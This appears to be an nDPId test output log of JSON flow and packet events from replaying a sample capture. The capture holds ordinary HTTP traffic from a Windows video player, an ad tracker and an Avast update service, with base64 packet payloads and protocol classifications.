-01140{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1021,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1467353141308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353141308,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uEFAADMGggXKbA7bwKhzCABQxS1wKzTY7Tl5ilAYADfR4AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1467353142534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353142534,"pkt":"TF4M6gNlABxCjnAxCABFAAOkBEBAAIAG5grAqHMIymwO7MUnAFCB65f\/kZem+1AYQRL+yQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNDIwNDQmc2g9JnNxPSZzdz0mdD0xcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353144633,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1467353144633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"thread_ts_msec":1467353144633,"pkt":"ABxCjnAxTF4M6gNlCABFAAFNZb1AADAG6WZ1T1GHwKhzCABQxQsUvd5l87WhOFAYAA4qLgAASFRUUC8xLjEgMzAyIEZvdW5kDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjMzIEdNVA0KQ29udGVudC1MZW5ndGg6IDANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClNldC1Db29raWU6IFY9NjY5Mzg1MTYxNTg4NTA0OTAxMTsgRG9tYWluPW1sdDAxLmNvbTsgRXhwaXJlcz1TYXQsIDAxLUp1bC0yMDE3IDA2OjA1OjM3IEdNVDsgUGF0aD0vDQpMb2NhdGlvbjogaHR0cDovL2NtYy50YW54LmNvbS9hbmRjP2FuZGNfdWlkPTY2OTM4NTE2MTU4ODUwNDkwMTEmYW5kY192ZXI9MQ0KDQo="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7440000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00971{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1467353144819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":444,"pkt_l4_len":410,"thread_ts_msec":1467353144819,"pkt":"TF4M6gNlABxCjnAxCABFAAGuBX9AAIAGQAzAqHMIjM3zQMUyAFBCtQhgUXsfllAYQTeurQAAR0VUIC9hbmRjP2FuZGNfdWlkPTY2OTM4NTE2MTU4ODUwNDkwMTEmYW5kY192ZXI9MSBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNClJlZmVyZXI6IGh0dHA6Ly9pbWFnZTEud2Vic2NhY2hlLmNvbS92b2RndWlkZS9pbWFnZXMvdGFvYmFvYWQvdGFvYmFvL3Rhb2Jhby5odG1sDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KQ29va2llOiBjbmE9L2NBSER3UTFtMndDQVhhakNGbzBCbmxmOyBjbmF1aT0xOTgzMTU5NDkzDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiBjbWMudGFueC5jb20NCg0K"} -00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7440000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cmc.tanx.com","url":"cmc.tanx.com\/andc?andc_uid=6693851615885049011&andc_ver=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1467353144913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1467353144913,"pkt":"ABxCjnAxTF4M6gNlCABFAAENPiNAACwGXAmMzfNAwKhzCABQxTJRex+WQrUJ5lAYFg2SoAAASFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBjbG9zZQ0KU2VydmVyOiBUZW5naW5lDQpUaW1pbmctQWxsb3ctT3JpZ2luOiAqDQoNCjMxDQpHSUY4OWEBAAEAkQAAAAAA\/\/\/\/\/\/\/\/AAAAIfkEAQAAAgAsAAAAAAEAAQAAAgJUAQA7DQowDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7440000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00935{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1467353147705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1467353147705,"pkt":"TF4M6gNlABxCjnAxCABFAAGTCAFAAIAG5GvAqHMIymwO28UzAFD2bwdscQOwMVAYAQQLYgAAR0VUIC9jb3JlP3Q9MTUwMzI5MSZ0eXBlPXZzJnV1aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mYXJlYT1PVkVSU0VBfFRXX0hpTmV0JmZyb209QlNfSGlnaCZ0bz1CU19TdGFuZGFyZCZwbGF5ZXJfc3dpdGNoX2JzX3RpbWU9NDE3MTQmYXZlcmFnZV9kb3dubG9hZF9zcGVlZF89MTU4NTE1LjIwMDAwMCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7440000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1503291&type=vs&uuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&area=OVERSEA|TW_HiNet&from=BS_High&to=BS_Standard&player_switch_bs_time=41714&average_download_speed_=158515.200000","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1467353147794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353147794,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FnZAADMGI9HKbA7bwKhzCABQxTNxA7Ax9m8I11AYADa2JwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7440000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01211{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1467353147927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":622,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":622,"pkt_l4_len":588,"thread_ts_msec":1467353147927,"pkt":"TF4M6gNlABxCjnAxCABFAAJgCC5AAIAG43HAqHMIymwO28U0AFClUF0ecJA2DlAYAQSk3gAAR0VUIC9jb3JlP3Q9NSZhPTQmaXNmaW5pc2g9MiZ0bT03JnJhPTImdHJhPTEmcGY9MjAxJnA9MTEmcDE9MTE0JnAyPTMwMDAmc2RrdHA9MSZjMT02JnI9NTAwNDk0NjAwJmFpZD01MDI5NTk5MDAmdT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZwdT0mb3M9d2luZG93cyZ2PTUlMkUyJTJFMTUlMkUyMjQwJmtydj0yJTJFMCUyRTEwMiZkdD0maHU9LTEmcm49MTQ2NzM1MzE0NyZpc2xvY2FsPTAmYXM9ZDE5ZjY0MDQ3YjY0MWNkNmZmMDk2YjA0ZmIyYTMwYjUmdmU9M2NjMGM4ZmEzNzI2MjVlNjQxNDMxNDQ4MTZmM2U5NjgmcGU9Yzk1ZDk5MmUyOTg1NmRjODRmMmU5OTA3YTJlNGIyODImdmZybT0mY2hsPSZoY2Rudj0xMC4wLjAuMjkzJnRwY2Q9MCZpc2RybT0xJmh0PTAgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} -01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7440000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=4&isfinish=2&tm=7&ra=2&tra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353147&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1467353148016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353148016,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kRtAADMGqSvKbA7bwKhzCABQxTRwkDYOpVBfVlAYADcrXAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1467353150114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353150114,"pkt":"TF4M6gNlABxCjnAxCABFAAOlCc1AAIAG4HzAqHMIymwO7MU1AFBQgbYWJ\/60ElAYQTeIsAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNDkwNDUmc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} -01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353149045&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1467353150272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353150272,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5A3BAADMGNsbKbA7swKhzCABQxTUn\/rQSUIG5k1AYACEwggAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1467353151975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAADZC01AAIAGRNfAqHMITeooYMU2AFCms6ewkbp6GVAYAQQ6hQAAUE9TVCAvYmMyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtZW5jDQpVc2VyLUFnZW50OiB7RDY5OTA1NEQtMTY5OS00N0QyLTlCMkItRTk2RjQzOEMxMTYwfQ0KQ29udGVudC1MZW5ndGg6IDU2NzANCkhvc3Q6IGJjdS5mZi5hdmFzdC5jb20NCg0K"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"},"http": {"hostname":"bcu.ff.avast.com","url":"bcu.ff.avast.com\/bc2","code":0,"content_type":"","user_agent":"{D699054D-1699-47D2-9B2B-E96F438C1160}"}} 